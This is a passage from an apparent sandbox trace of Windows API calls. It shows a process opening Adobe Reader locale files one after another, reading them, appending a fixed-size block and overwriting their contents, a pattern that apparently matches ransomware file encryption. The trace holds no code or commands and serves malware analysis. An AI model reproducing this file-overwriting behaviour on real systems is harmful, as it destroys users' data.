lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0084.484] WriteFile (in: hFile=0x1d4, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0084.484] CloseHandle (hObject=0x1d4) returned 1 [0084.484] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\EScript.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\escript.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0084.485] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.485] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa400 [0084.485] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.485] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.485] ReleaseMutex (hMutex=0x168) returned 1 [0084.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.RUM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0084.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.RUM", cchWideChar=11, lpMultiByteStr=0x1f7360c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.RUM", lpUsedDefaultChar=0x0) returned 11 [0084.486] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0084.500] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x9400 [0084.500] ReadFile (in: hFile=0x1d4, lpBuffer=0x2696e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2696e48*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.511] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x9400 [0084.512] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.512] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0084.512] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0084.512] CloseHandle (hObject=0x1d4) returned 1 [0084.513] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Reflow.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\reflow.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0084.516] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.516] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1200 [0084.517] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.517] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.517] ReleaseMutex (hMutex=0x168) returned 1 [0084.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.RUM", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.RUM", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reflow.RUM", lpUsedDefaultChar=0x0) returned 10 [0084.517] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0084.525] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0084.525] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0084.526] CloseHandle (hObject=0x1d4) returned 1 [0084.526] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Weblink.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\weblink.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0084.526] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.526] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x7200 [0084.527] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.527] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.527] ReleaseMutex (hMutex=0x168) returned 1 [0084.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.RUM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0084.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.RUM", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.RUM", lpUsedDefaultChar=0x0) returned 11 [0084.527] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.529] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6200 [0084.529] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.530] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6200 [0084.530] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.531] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0084.531] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.531] CloseHandle (hObject=0x1d4) returned 1 [0084.531] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\DVA.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\dva.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0084.532] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.532] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4a00 [0084.532] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.532] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.532] ReleaseMutex (hMutex=0x168) returned 1 [0084.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.RUS", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0084.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.RUS", cchWideChar=7, lpMultiByteStr=0x1f7aa14, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.RUS", lpUsedDefaultChar=0x0) returned 7 [0084.533] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.097] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3a00 [0085.097] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.104] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3a00 [0085.104] WriteFile (in: hFile=0x1d4, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.105] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.105] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.105] CloseHandle (hObject=0x1d4) returned 1 [0085.106] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\RdLang32.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\rdlang32.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.106] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.106] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x14d800 [0085.107] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.107] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.107] ReleaseMutex (hMutex=0x168) returned 1 [0085.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.RUS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.RUS", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.RUS", lpUsedDefaultChar=0x0) returned 12 [0085.107] ReadFile (in: hFile=0x1d4, lpBuffer=0x28a3918, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0085.122] ReadFile (in: hFile=0x1d4, lpBuffer=0x28a3918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.129] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x14c800 [0085.129] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.136] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x14c800 [0085.137] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.137] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.137] WriteFile (in: hFile=0x1d4, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0085.138] WriteFile (in: hFile=0x1d4, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.138] CloseHandle (hObject=0x1d4) returned 1 [0085.138] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Spelling.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\spelling.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.139] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.139] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2800 [0085.139] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.140] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.140] ReleaseMutex (hMutex=0x168) returned 1 [0085.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.RUS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.RUS", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.RUS", lpUsedDefaultChar=0x0) returned 12 [0085.140] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.151] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1800 [0085.151] ReadFile (in: hFile=0x1d4, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.152] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1800 [0085.152] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.152] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.152] WriteFile (in: hFile=0x1d4, lpBuffer=0x25ad0a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.153] CloseHandle (hObject=0x1d4) returned 1 [0085.153] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Checkers.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\checkers.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.153] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.153] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1e000 [0085.154] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.154] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.154] ReleaseMutex (hMutex=0x168) returned 1 [0085.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.SKY", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.SKY", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.SKY", lpUsedDefaultChar=0x0) returned 12 [0085.154] ReadFile (in: hFile=0x1d4, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.163] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1d000 [0085.163] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.169] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1d000 [0085.169] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.169] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.170] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.170] CloseHandle (hObject=0x1d4) returned 1 [0085.170] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\pddom.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\pddom.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.170] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.171] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2c00 [0085.171] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.171] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.171] ReleaseMutex (hMutex=0x168) returned 1 [0085.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.SKY", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.SKY", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.SKY", lpUsedDefaultChar=0x0) returned 9 [0085.171] ReadFile (in: hFile=0x1d4, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.179] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1c00 [0085.180] ReadFile (in: hFile=0x1d4, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.186] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1c00 [0085.186] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, 